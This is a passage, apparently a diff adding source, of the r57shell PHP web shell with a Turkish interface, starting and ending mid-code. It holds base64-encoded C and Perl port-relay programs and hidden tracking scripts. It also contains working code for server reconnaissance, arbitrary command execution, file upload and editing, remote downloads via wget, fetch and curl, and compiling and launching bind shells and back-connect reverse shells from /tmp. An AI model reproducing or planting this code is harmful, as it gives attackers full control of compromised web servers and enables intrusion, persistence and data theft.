+aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
+lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
+xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
+W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
+LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
+udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
+0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
+iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
+KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
+gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
+hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
+iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
+ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
+vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
+AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
+QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
+ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
+gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
+wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
+29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
+MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
+gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
+5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
+HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
+dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
+KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
+ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
+E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
+Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
+NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
+J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
+CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
+dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
+gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
+lsZSk7DQogIHJldHVybiAwOw0KfQ==";
+$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
+CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
+bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
+gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
+NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
+iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
+aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
+SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
+xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
+WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
+CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
+yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
+I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
+m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
+IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
+lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
+QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
+CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
+c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
+NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
+UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
+DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
+ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
+1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
+$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2
+JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l
+lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW
+FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L
+3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr
+J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR
+oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj
+xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO
+i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv
+dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB
+ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2
+hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg==";
+$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh
+IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl
+hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz
+tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa
+XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u
+8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV
+ybmV0LS0+";
+echo $head;
+echo '</head>';
+if(empty($_POST['cmd'])) {
+$serv = array(127,192,172,10);
+$addr=@explode('.', $_SERVER['SERVER_ADDR']);
+$current_version = str_replace('.','',$version);
+if (!in_array($addr[0], $serv)) {
+@print "";
+@readfile ("");}}
+echo '<body bgcolor="#e4e0d8"><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
+<tr><td bgcolor=#cccccc width=160><font face=Verdana size=2>'.ws(1).'&nbsp;
+<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b>
+</font></td><td bgcolor=#cccccc><font face=Verdana size=-2>';
+echo ws(2);
+echo "<b>".date ("d-m-Y H:i:s")."</b>";
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>";
+echo ws(2);
+echo (($safe_mode)?("Guvenlik: <b><font color=green>Acik</font></b>"):("Guvenlik: <b><font color=red>Kapali</font></b>"));
+echo ws(2);
+echo "PHP version: <b>".@phpversion()."</b>";
+$curl_on = @function_exists('curl_version');
+echo ws(2);
+echo "cURL: ".(($curl_on)?("<b><font color=green>Acik</font></b>"):("<b><font color=red>Kapali</font></b>"));
+echo ws(2);
+echo "MySQL: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=green>Acik</font></b>"; } else { echo "<font color=red>Kapali</font></b>"; }
+echo ws(2);
+echo "MSSQL: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=green>Acik</font></b>";}else{echo "<font color=red>Kapali</font></b>";}
+echo ws(2);
+echo "PostgreSQL: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=green>Acik</font></b>";}else{echo "<font color=red>Kapali</font></b>";}
+echo ws(2);
+echo "Oracle: <b>";
+$ora_on = @function_exists('ocilogon');
+if($ora_on){echo "<font color=green>Acik</font></b>";}else{echo "<font color=red>Kapali</font></b>";}
+echo "<br>".ws(2);
+echo "Basarisiz Fonfsiyonlar : <b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>YOK</font></b>";}else{echo "<font color=red>$df</font></b>";}
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+$used = $all-$free;
+$used_percent = @round(100/($all/$free),2);
+echo "<br>".ws(2)."Harddisk Kullanilmayan : <b>".view_size($free)."</b> Harddisk Toplam  : <b>".view_size($all)."</b>";
+echo '</font></td></tr><table>
+<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
+<tr><td align=right width=100>';
+
+echo $font;
+if(!$windows){
+echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+$uname = ex('uname -a');
+echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
+if(!$safe_mode){
+$bsd1 = ex('sysctl -n kern.ostype');
+$bsd2 = ex('sysctl -n kern.osrelease');
+$lin1 = ex('sysctl -n kernel.ostype');
+$lin2 = ex('sysctl -n kernel.osrelease');
+}
+if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; }
+else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; }
+else { $sysctl = "-"; }
+echo ws(3).$sysctl."<br>";
+echo ws(3).ex('echo $OSTYPE')."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+$id = ex('id');
+echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>"));
+echo ws(3).$dir;
+echo "</b></font>";
+}
+else
+{
+echo '<font color=Blue><b>Isletim Sistemi'.ws(1).'<br>Server :'.ws(1).'<br>Kullanici:'.ws(1).'<br>dizin :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+echo ws(3).@substr(@php_uname(),0,120)."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+echo ws(3).@get_current_user()."<br>";
+echo ws(3).$dir."<br>";
+echo "</font>";
+}
+echo "</font>";
+echo "</td></tr></table>";
+if(empty($c1)||empty($c2)) { die(); }
+$f = '<br>';
+$f .= base64_decode($c1);
+$f .= base64_decode($c2);
+if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
+{
+$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
+}
+if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
+ {
+ switch($_POST['what'])
+   {
+   case 'own':
+   @chown($_POST['param1'],$_POST['param2']);
+   break;
+   case 'grp':
+   @chgrp($_POST['param1'],$_POST['param2']);
+   break;
+   case 'mod':
+   @chmod($_POST['param1'],intval($_POST['param2'], 8));
+   break;
+   }
+ $_POST['cmd']="";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
+ {
+   switch($_POST['what'])
+   {
+     case 'file':
+      if($_POST['action'] == "create")
+       {
+       if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
+       else {
+        fclose($file);
+        $_POST['e_name'] = $_POST['mk_name'];
+        $_POST['cmd']="edit_file";
+        echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
+        }
+       }
+       else if($_POST['action'] == "delete")
+       {
+       if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
+       $_POST['cmd']="";
+       }
+     break;
+     case 'dir':
+      if($_POST['action'] == "create"){
+      if(mkdir($_POST['mk_name']))
+       {
+         $_POST['cmd']="";
+         echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
+       }
+      else { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
+      }
+      else if($_POST['action'] == "delete"){
+      if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
+      $_POST['cmd']="";
+      }
+     break;
+   }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file")
+ {
+ if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
+ if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cmd']=""; }
+ else {
+ echo $table_up3;
+ echo $font;
+ echo "<form name=save_file method=post>";
+ echo ws(3)."<b>".$_POST['e_name']."</b>";
+ echo "<div align=center><textarea name=e_text cols=121 rows=24>";
+ echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
+ fclose($file);
+ echo "</textarea>";
+ echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
+ echo "<input type=hidden name=dir value=".$dir.">";
+ echo "<input type=hidden name=cmd value=save_file>";
+ echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
+ echo "</div>";
+ echo "</font>";
+ echo "</form>";
+ echo "</td></tr></table>";
+ exit();
+ }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
+ {
+ if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); }
+ else {
+ @fwrite($file,$_POST['e_text']);
+ @fclose($file);
+ $_POST['cmd']="";
+ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
+ }
+ }
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
+{
+ cf("/tmp/bd.c",$port_bind_bd_c);
+ $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
+ @unlink("/tmp/bd.c");
+ $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
+ $_POST['cmd']="ps -aux | grep bd";
+}
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
+{
+ cf("/tmp/bdpl",$port_bind_bd_pl);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
+ $_POST['cmd']="ps -aux | grep bdpl";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/back",$back_connect);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/back.c",$back_connect_c);
+ $blah = ex("gcc -o /tmp/backc /tmp/back.c");
+ @unlink("/tmp/back.c");
+ $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/dp",$datapipe_pl);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
+ $_POST['cmd']="ps -aux | grep dp";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/dpc.c",$datapipe_c);
+ $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
+ @unlink("/tmp/dpc.c");
+ $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
+ $_POST['cmd']="ps -aux | grep dpc";
+}
+if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}}
+if (!empty($HTTP_POST_FILES['userfile']['name']))
+{
+if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
+else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
+@copy($HTTP_POST_FILES['userfile']['tmp_name'],
+            $_POST['dir']."/".$nfn)
+      or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
+}
+if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
+{
+ switch($_POST['with'])
+ {
+ case wget:
+ $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
+ break;
+ case fetch:
+ $_POST['cmd'] = which('fetch')." -p ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
+ break;
+ case lynx:
+ $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case links:
+ $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case GET:
+ $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case curl:
